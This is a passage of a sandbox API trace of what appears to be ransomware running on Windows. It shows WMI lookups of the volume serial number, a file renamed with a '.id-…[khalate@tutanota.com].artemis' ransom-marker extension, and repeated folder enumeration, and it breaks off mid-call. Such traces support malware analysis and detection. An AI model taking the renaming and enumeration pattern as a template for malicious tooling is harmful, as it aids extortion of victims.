[0192.257] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee20*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee20*=0x20, pszText=0x0) returned 0x0 [0192.257] WbemDefPath:IWbemPath:GetText (in: This=0x6738460, lFlags=2, puBuffLength=0x6bcee20*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee20*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.257] IWbemServices:GetObject (in: This=0x67481b4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bcedd4*=0x0, ppCallResult=0x0 | out: ppObject=0x6bcedd4*=0x673c128, ppCallResult=0x0) returned 0x0 [0193.051] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6bcedd4 | out: puCount=0x6bcedd4*=0x2) returned 0x0 [0193.051] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6bcedd0*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedd0*=0xf, pszText=0x0) returned 0x0 [0193.051] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6bcedd0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcedd0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.051] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcedd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33f7bec*=0, plFlavor=0x33f7bf0*=0 | out: pVal=0x6bcedd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33f7bec*=8, plFlavor=0x33f7bf0*=0) returned 0x0 [0193.051] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.051] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.051] IWbemClassObject:Get (in: This=0x673c128, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcedd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33f7bec*=8, plFlavor=0x33f7bf0*=0 | out: pVal=0x6bcedd8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33f7bec*=8, plFlavor=0x33f7bf0*=0) returned 0x0 [0193.051] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.051] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6bce9d8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0193.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bce9d8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5e [0193.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee38) returned 1 [0193.052] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), fInfoLevelId=0x0, lpFileInformation=0x6bceeb4 | out: lpFileInformation=0x6bceeb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19220440, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x18560)) returned 1 [0193.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee34) returned 1 [0193.052] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), lpNewFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0193.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcefbc) returned 1 [0193.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0193.053] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x6bcea98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0193.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6bcece4 | out: lpFindFileData=0x6bcece4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0193.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0193.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0193.053] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ink", cAlternateFileName="")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSClientDataMgr", cAlternateFileName="MSCLIE~1")) returned 1 [0193.054] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b0da70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69e61cd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROOF", cAlternateFileName="")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd5807780, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smart Tag", cAlternateFileName="SMARTT~1")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef4d890, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef4d890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0193.055] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0193.056] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TextConv", cAlternateFileName="")) returned 1 [0193.296] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="THEMES14", cAlternateFileName="")) returned 1 [0193.297] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0193.297] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Triedit", cAlternateFileName="")) returned 1 [0193.297] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VBA", cAlternateFileName="")) returned 1 [0193.297] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd2c6940, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xd250e300, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd250e300, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC", cAlternateFileName="")) returned 1 [0193.297] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x803feff7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x803feff7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX", cAlternateFileName="")) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81afcd40, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visio Shared", cAlternateFileName="VISIOS~1")) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTO", cAlternateFileName="")) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a02ad50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Folders", cAlternateFileName="WEBFOL~1")) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0193.298] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0193.298] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0193.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef7c) returned 1 [0193.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef88) returned 1 [0193.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcefbc) returned 1 [0193.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared", lpFilePart=0x0) returned 0x2e [0193.299] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\", nBufferLength=0x105, lpBuffer=0x6bcea98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\", lpFilePart=0x0) returned 0x2f [0193.299] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x6bcece4 | out: lpFindFileData=0x6bcece4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0193.299] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.299] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0193.299] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x6bcecf4 | out: lpFindFileData=0x6bcecf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help", cAlternateFileName="")) returned 1 [0193.300] FindNextFileW (in: hFindFile=0x77b5b0, 